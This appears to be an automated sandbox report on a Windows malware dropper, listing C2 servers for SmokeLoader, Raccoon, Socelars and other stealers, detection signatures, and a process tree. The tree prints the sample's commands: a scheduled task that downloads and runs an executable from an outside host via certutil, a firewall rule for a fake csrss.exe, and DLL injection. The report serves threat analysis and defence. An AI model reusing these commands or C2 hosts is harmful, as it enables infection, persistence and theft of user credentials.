Resubmissions

04-10-2024 18:01

241004-wl132axhpm 10

22-04-2024 20:52

240422-znvwksgb77 10

27-02-2024 22:40

240227-2lykssdc83 10

03-01-2024 09:53

240103-lw3dqscehj 10

29-12-2023 23:48

231229-3txtxadcb8 10

Analysis

  • max time kernel
    0s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    03-01-2024 09:53

General

  • Target

    078192e792b12a8d9980f364e110155c.exe

  • Size

    8.7MB

  • MD5

    078192e792b12a8d9980f364e110155c

  • SHA1

    89596e27530eeccd6ad9644aa045e8e0499301a1

  • SHA256

    67b1a7835687bf5851cf29539b2d0ce90ab30d373edfcf9ee54237026c67df33

  • SHA512

    72a2f85f8aa87fed3b84641bfc4ecde195588837da52553871b9aa917b26c073fea973d2e521290ac08ef6907a21677ebf7bb7886ddef3996625cc81855c0bbc

  • SSDEEP

    196608:UYE5OOysmxHcbDvsAKhZcIGijUtw+cs3Ax9stqFiRtHTV3hZF:XE5OOSuszcTtwp1s8gRtHT5J

Malware Config

Extracted

Family

ffdroider

C2

http://186.2.171.3

Extracted

Family

smokeloader

Botnet

pub2

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

raccoon

Version

1.7.3

Botnet

92be0387873e54dd629b9bfa972c3a9a88e6726c

Attributes
  • url4cnc

    https://t.me/gishsunsetman

rc4.plain
rc4.plain

Signatures

  • Detect Fabookie payload 1 IoCs
  • FFDroider

    Stealer targeting social media platform users first seen in April 2022.

  • FFDroider payload 2 IoCs
  • Fabookie

    Fabookie is facebook account info stealer.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 4 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Raccoon is an infostealer written in C++ and first seen in 2019.

  • Raccoon Stealer V1 payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars payload 1 IoCs
  • Nirsoft 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 21 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Unexpected DNS network traffic destination 4 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Amadey 3 IoCs

    amadey_bot.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 3 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Kills process with taskkill 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\078192e792b12a8d9980f364e110155c.exe
    "C:\Users\Admin\AppData\Local\Temp\078192e792b12a8d9980f364e110155c.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2536
    • C:\Users\Admin\AppData\Local\Temp\Files.exe
      "C:\Users\Admin\AppData\Local\Temp\Files.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      PID:2664
      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        3⤵
          PID:684
        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          3⤵
            PID:2344
        • C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
          "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
          2⤵
            PID:1816
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 176
              3⤵
              • Program crash
              PID:812
          • C:\Users\Admin\AppData\Local\Temp\Complete.exe
            "C:\Users\Admin\AppData\Local\Temp\Complete.exe"
            2⤵
              PID:1760
            • C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
              "C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"
              2⤵
                PID:2952
                • C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
                  C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
                  3⤵
                    PID:2848
                • C:\Users\Admin\AppData\Local\Temp\pub2.exe
                  "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
                  2⤵
                    PID:2932
                  • C:\Users\Admin\AppData\Local\Temp\Install_Files.exe
                    "C:\Users\Admin\AppData\Local\Temp\Install_Files.exe"
                    2⤵
                      PID:3016
                    • C:\Users\Admin\AppData\Local\Temp\Info.exe
                      "C:\Users\Admin\AppData\Local\Temp\Info.exe"
                      2⤵
                        PID:2280
                      • C:\Users\Admin\AppData\Local\Temp\Folder.exe
                        "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
                        2⤵
                          PID:2748
                        • C:\Users\Admin\AppData\Local\Temp\Install.exe
                          "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2580
                        • C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
                          "C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:2792
                      • C:\Program Files\Internet Explorer\iexplore.exe
                        "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                        1⤵
                          PID:1500
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1500 CREDAT:275457 /prefetch:2
                            2⤵
                              PID:912
                          • C:\Windows\system32\rUNdlL32.eXe
                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                            1⤵
                              PID:2248
                              • C:\Windows\SysWOW64\rundll32.exe
                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                2⤵
                                  PID:1528
                                • C:\Windows\system32\netsh.exe
                                  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                  2⤵
                                  • Modifies Windows Firewall
                                  PID:2044
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                1⤵
                                  PID:2108
                                • C:\Windows\system32\makecab.exe
                                  "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240103095422.log C:\Windows\Logs\CBS\CbsPersist_20240103095422.cab
                                  1⤵
                                    PID:2188
                                  • C:\Users\Admin\AppData\Local\Temp\Info.exe
                                    "C:\Users\Admin\AppData\Local\Temp\Info.exe"
                                    1⤵
                                      PID:2384
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                        2⤵
                                          PID:2248
                                        • C:\Windows\rss\csrss.exe
                                          C:\Windows\rss\csrss.exe /94-94
                                          2⤵
                                            PID:700
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                                              3⤵
                                              • Creates scheduled task(s)
                                              PID:1980
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                              3⤵
                                              • Creates scheduled task(s)
                                              PID:1480
                                            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                                              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                                              3⤵
                                                PID:1096
                                              • C:\Windows\system32\bcdedit.exe
                                                C:\Windows\Sysnative\bcdedit.exe /v
                                                3⤵
                                                • Modifies boot configuration data using bcdedit
                                                PID:2932
                                              • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                3⤵
                                                  PID:2316
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c taskkill /f /im chrome.exe
                                              1⤵
                                                PID:1748
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /f /im chrome.exe
                                                  2⤵
                                                  • Kills process with taskkill
                                                  PID:876
                                              • C:\Users\Admin\AppData\Local\Temp\Folder.exe
                                                "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
                                                1⤵
                                                  PID:2800
                                                • C:\Windows\system32\conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe "-1091914815-43854897514514557711330834398924401735-490378816-1972998648707689730"
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:2748

                                                Network

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Users\Admin\AppData\Local\Temp\Folder.exe

                                                  Filesize

                                                  712KB

                                                  MD5

                                                  b89068659ca07ab9b39f1c580a6f9d39

                                                  SHA1

                                                  7e3e246fcf920d1ada06900889d099784fe06aa5

                                                  SHA256

                                                  9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

                                                  SHA512

                                                  940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

                                                • C:\Users\Admin\AppData\Local\Temp\Install.exe

                                                  Filesize

                                                  1.4MB

                                                  MD5

                                                  41b7c6d48d13e1a864bf2d3759e257e6

                                                  SHA1

                                                  7ee45121a927d744941651bd6673d3df21f1611b

                                                  SHA256

                                                  820c980f68378170cec0e1f2f4e2e319a07b1d030d7712ece110f579fcd1a8c2

                                                  SHA512

                                                  0ac230d6ea4f7eaf1c5dbc919e1de41416e4c5e527e0ec583135eab2067d0fcd22615d80a93f803ce327cdbb58b5b236ca47d759647b8c36a98a17a3e1504077

                                                • C:\Users\Admin\AppData\Local\Temp\KRSetp.exe

                                                  Filesize

                                                  201KB

                                                  MD5

                                                  b70f516d57624c741cabeebb65cce996

                                                  SHA1

                                                  98c27ae9fa2742dfedcf765c5b37d7830673c2ff

                                                  SHA256

                                                  32e4d190cebe0be41e148b8863fad2c8973b1afc9d60238ac9ec1daeb1e1a2d2

                                                  SHA512

                                                  aae21583810803053b0112f720c142de570b75c41d6bb63ae7e870750678478cc7140204c1108b83fee7f53de77e5de2a9752fdff0279563ceea94c2401acf95

                                                • \Users\Admin\AppData\Local\Temp\Files.exe

                                                  Filesize

                                                  975KB

                                                  MD5

                                                  2d0217e0c70440d8c82883eadea517b9

                                                  SHA1

                                                  f3b7dd6dbb43b895ba26f67370af99952b7d83cb

                                                  SHA256

                                                  d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

                                                  SHA512

                                                  6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

                                                • \Users\Admin\AppData\Local\Temp\Folder.exe

                                                  Filesize

                                                  92KB

                                                  MD5

                                                  9c00f7d3c6751d54314ff8bd19372a83

                                                  SHA1

                                                  eba0dd42316b5bcb22a996153548ef1aa5607063

                                                  SHA256

                                                  6b18805d3fff207428d8443e546a846073d199ac9e080d7493146e736cb7ea8c

                                                  SHA512

                                                  7c1d0f35f564031be5c59e84d805210033d7ee056d897ceddeb2daec40fd6be412d8b8fed16e210e49feff7c400a5f226bdd2326874df68b75c5e810edafb94d

                                                • memory/684-192-0x0000000000400000-0x000000000045B000-memory.dmp

                                                  Filesize

                                                  364KB

                                                • memory/700-1364-0x0000000004900000-0x0000000004D3C000-memory.dmp

                                                  Filesize

                                                  4.2MB

                                                • memory/700-1633-0x0000000000400000-0x000000000309C000-memory.dmp

                                                  Filesize

                                                  44.6MB

                                                • memory/700-725-0x0000000004900000-0x0000000004D3C000-memory.dmp

                                                  Filesize

                                                  4.2MB

                                                • memory/700-1564-0x0000000000400000-0x000000000309C000-memory.dmp

                                                  Filesize

                                                  44.6MB

                                                • memory/700-1111-0x0000000000400000-0x000000000309C000-memory.dmp

                                                  Filesize

                                                  44.6MB

                                                • memory/700-1535-0x0000000000400000-0x000000000309C000-memory.dmp

                                                  Filesize

                                                  44.6MB

                                                • memory/700-1593-0x0000000000400000-0x000000000309C000-memory.dmp

                                                  Filesize

                                                  44.6MB

                                                • memory/700-1598-0x0000000000400000-0x000000000309C000-memory.dmp

                                                  Filesize

                                                  44.6MB

                                                • memory/700-1634-0x0000000000400000-0x000000000309C000-memory.dmp

                                                  Filesize

                                                  44.6MB

                                                • memory/700-1372-0x0000000000400000-0x000000000309C000-memory.dmp

                                                  Filesize

                                                  44.6MB

                                                • memory/700-1335-0x0000000000400000-0x000000000309C000-memory.dmp

                                                  Filesize

                                                  44.6MB

                                                • memory/700-1102-0x0000000004900000-0x0000000004D3C000-memory.dmp

                                                  Filesize

                                                  4.2MB

                                                • memory/700-1632-0x0000000000400000-0x000000000309C000-memory.dmp

                                                  Filesize

                                                  44.6MB

                                                • memory/700-1597-0x0000000000400000-0x000000000309C000-memory.dmp

                                                  Filesize

                                                  44.6MB

                                                • memory/700-1370-0x0000000000400000-0x000000000309C000-memory.dmp

                                                  Filesize

                                                  44.6MB

                                                • memory/700-1596-0x0000000000400000-0x000000000309C000-memory.dmp

                                                  Filesize

                                                  44.6MB

                                                • memory/700-1600-0x0000000000400000-0x000000000309C000-memory.dmp

                                                  Filesize

                                                  44.6MB

                                                • memory/848-246-0x0000000000470000-0x00000000004BC000-memory.dmp

                                                  Filesize

                                                  304KB

                                                • memory/848-312-0x0000000001A40000-0x0000000001AB1000-memory.dmp

                                                  Filesize

                                                  452KB

                                                • memory/848-244-0x0000000001A40000-0x0000000001AB1000-memory.dmp

                                                  Filesize

                                                  452KB

                                                • memory/848-231-0x0000000000470000-0x00000000004BC000-memory.dmp

                                                  Filesize

                                                  304KB

                                                • memory/1096-1201-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                  Filesize

                                                  5.9MB

                                                • memory/1096-1206-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                  Filesize

                                                  5.9MB

                                                • memory/1196-593-0x0000000002540000-0x0000000002556000-memory.dmp

                                                  Filesize

                                                  88KB

                                                • memory/1528-242-0x0000000000850000-0x00000000008AD000-memory.dmp

                                                  Filesize

                                                  372KB

                                                • memory/1528-232-0x0000000002000000-0x0000000002101000-memory.dmp

                                                  Filesize

                                                  1.0MB

                                                • memory/1528-257-0x0000000000850000-0x00000000008AD000-memory.dmp

                                                  Filesize

                                                  372KB

                                                • memory/1816-178-0x0000000000400000-0x000000000060D000-memory.dmp

                                                  Filesize

                                                  2.1MB

                                                • memory/1816-317-0x0000000000400000-0x000000000060D000-memory.dmp

                                                  Filesize

                                                  2.1MB

                                                • memory/1816-173-0x0000000000400000-0x000000000060D000-memory.dmp

                                                  Filesize

                                                  2.1MB

                                                • memory/2108-258-0x00000000000F0000-0x000000000013C000-memory.dmp

                                                  Filesize

                                                  304KB

                                                • memory/2108-260-0x0000000000460000-0x00000000004D1000-memory.dmp

                                                  Filesize

                                                  452KB

                                                • memory/2108-1371-0x0000000000460000-0x00000000004D1000-memory.dmp

                                                  Filesize

                                                  452KB

                                                • memory/2108-951-0x0000000000460000-0x00000000004D1000-memory.dmp

                                                  Filesize

                                                  452KB

                                                • memory/2108-1599-0x0000000000460000-0x00000000004D1000-memory.dmp

                                                  Filesize

                                                  452KB

                                                • memory/2108-384-0x0000000000460000-0x00000000004D1000-memory.dmp

                                                  Filesize

                                                  452KB

                                                • memory/2108-1594-0x0000000000460000-0x00000000004D1000-memory.dmp

                                                  Filesize

                                                  452KB

                                                • memory/2280-106-0x0000000004C70000-0x00000000050AC000-memory.dmp

                                                  Filesize

                                                  4.2MB

                                                • memory/2280-281-0x0000000004C70000-0x00000000050AC000-memory.dmp

                                                  Filesize

                                                  4.2MB

                                                • memory/2280-387-0x0000000000400000-0x000000000309C000-memory.dmp

                                                  Filesize

                                                  44.6MB

                                                • memory/2280-315-0x0000000000400000-0x000000000309C000-memory.dmp

                                                  Filesize

                                                  44.6MB

                                                • memory/2280-328-0x00000000050B0000-0x00000000059D6000-memory.dmp

                                                  Filesize

                                                  9.1MB

                                                • memory/2344-591-0x0000000000400000-0x000000000045B000-memory.dmp

                                                  Filesize

                                                  364KB

                                                • memory/2384-726-0x0000000000400000-0x000000000309C000-memory.dmp

                                                  Filesize

                                                  44.6MB

                                                • memory/2384-687-0x0000000004D20000-0x0000000005646000-memory.dmp

                                                  Filesize

                                                  9.1MB

                                                • memory/2384-692-0x0000000000400000-0x000000000309C000-memory.dmp

                                                  Filesize

                                                  44.6MB

                                                • memory/2384-727-0x00000000048E0000-0x0000000004D1C000-memory.dmp

                                                  Filesize

                                                  4.2MB

                                                • memory/2384-386-0x00000000048E0000-0x0000000004D1C000-memory.dmp

                                                  Filesize

                                                  4.2MB

                                                • memory/2384-686-0x00000000048E0000-0x0000000004D1C000-memory.dmp

                                                  Filesize

                                                  4.2MB

                                                • memory/2536-169-0x0000000003FE0000-0x00000000041ED000-memory.dmp

                                                  Filesize

                                                  2.1MB

                                                • memory/2536-179-0x0000000003FE0000-0x00000000041ED000-memory.dmp

                                                  Filesize

                                                  2.1MB

                                                • memory/2536-261-0x0000000003FE0000-0x00000000041ED000-memory.dmp

                                                  Filesize

                                                  2.1MB

                                                • memory/2536-264-0x0000000003450000-0x0000000003452000-memory.dmp

                                                  Filesize

                                                  8KB

                                                • memory/2536-171-0x0000000003FE0000-0x00000000041ED000-memory.dmp

                                                  Filesize

                                                  2.1MB

                                                • memory/2536-172-0x0000000003FE0000-0x00000000041ED000-memory.dmp

                                                  Filesize

                                                  2.1MB

                                                • memory/2664-594-0x00000000001B0000-0x000000000020B000-memory.dmp

                                                  Filesize

                                                  364KB

                                                • memory/2664-1106-0x00000000001B0000-0x000000000020B000-memory.dmp

                                                  Filesize

                                                  364KB

                                                • memory/2664-1104-0x00000000001B0000-0x000000000020B000-memory.dmp

                                                  Filesize

                                                  364KB

                                                • memory/2664-196-0x0000000000190000-0x00000000001EB000-memory.dmp

                                                  Filesize

                                                  364KB

                                                • memory/2664-194-0x0000000000190000-0x00000000001EB000-memory.dmp

                                                  Filesize

                                                  364KB

                                                • memory/2664-490-0x0000000000190000-0x00000000001EB000-memory.dmp

                                                  Filesize

                                                  364KB

                                                • memory/2664-592-0x0000000000190000-0x00000000001EB000-memory.dmp

                                                  Filesize

                                                  364KB

                                                • memory/2792-78-0x0000000000840000-0x000000000087A000-memory.dmp

                                                  Filesize

                                                  232KB

                                                • memory/2792-507-0x000000001AF10000-0x000000001AF90000-memory.dmp

                                                  Filesize

                                                  512KB

                                                • memory/2792-271-0x000007FEF5480000-0x000007FEF5E6C000-memory.dmp

                                                  Filesize

                                                  9.9MB

                                                • memory/2792-195-0x000000001AF10000-0x000000001AF90000-memory.dmp

                                                  Filesize

                                                  512KB

                                                • memory/2792-1336-0x000007FEF5480000-0x000007FEF5E6C000-memory.dmp

                                                  Filesize

                                                  9.9MB

                                                • memory/2792-186-0x0000000000150000-0x0000000000178000-memory.dmp

                                                  Filesize

                                                  160KB

                                                • memory/2792-142-0x000007FEF5480000-0x000007FEF5E6C000-memory.dmp

                                                  Filesize

                                                  9.9MB

                                                • memory/2848-1143-0x0000000000400000-0x0000000000495000-memory.dmp

                                                  Filesize

                                                  596KB

                                                • memory/2848-1183-0x0000000000400000-0x0000000000495000-memory.dmp

                                                  Filesize

                                                  596KB

                                                • memory/2848-1181-0x0000000000400000-0x0000000000495000-memory.dmp

                                                  Filesize

                                                  596KB

                                                • memory/2932-256-0x0000000000400000-0x0000000002C6D000-memory.dmp

                                                  Filesize

                                                  40.4MB

                                                • memory/2932-602-0x0000000000400000-0x0000000002C6D000-memory.dmp

                                                  Filesize

                                                  40.4MB

                                                • memory/2932-209-0x0000000000230000-0x0000000000330000-memory.dmp

                                                  Filesize

                                                  1024KB

                                                • memory/2932-210-0x00000000003A0000-0x00000000003A9000-memory.dmp

                                                  Filesize

                                                  36KB

                                                • memory/2932-605-0x00000000003A0000-0x00000000003A9000-memory.dmp

                                                  Filesize

                                                  36KB

                                                • memory/2952-1145-0x0000000073020000-0x000000007370E000-memory.dmp

                                                  Filesize

                                                  6.9MB

                                                • memory/2952-330-0x0000000073020000-0x000000007370E000-memory.dmp

                                                  Filesize

                                                  6.9MB

                                                • memory/2952-1142-0x0000000000410000-0x0000000000438000-memory.dmp

                                                  Filesize

                                                  160KB

                                                • memory/2952-198-0x0000000001160000-0x00000000011A0000-memory.dmp

                                                  Filesize

                                                  256KB

                                                • memory/2952-642-0x0000000001160000-0x00000000011A0000-memory.dmp

                                                  Filesize

                                                  256KB

                                                • memory/2952-193-0x0000000073020000-0x000000007370E000-memory.dmp

                                                  Filesize

                                                  6.9MB

                                                • memory/2952-174-0x0000000001260000-0x00000000012EA000-memory.dmp

                                                  Filesize

                                                  552KB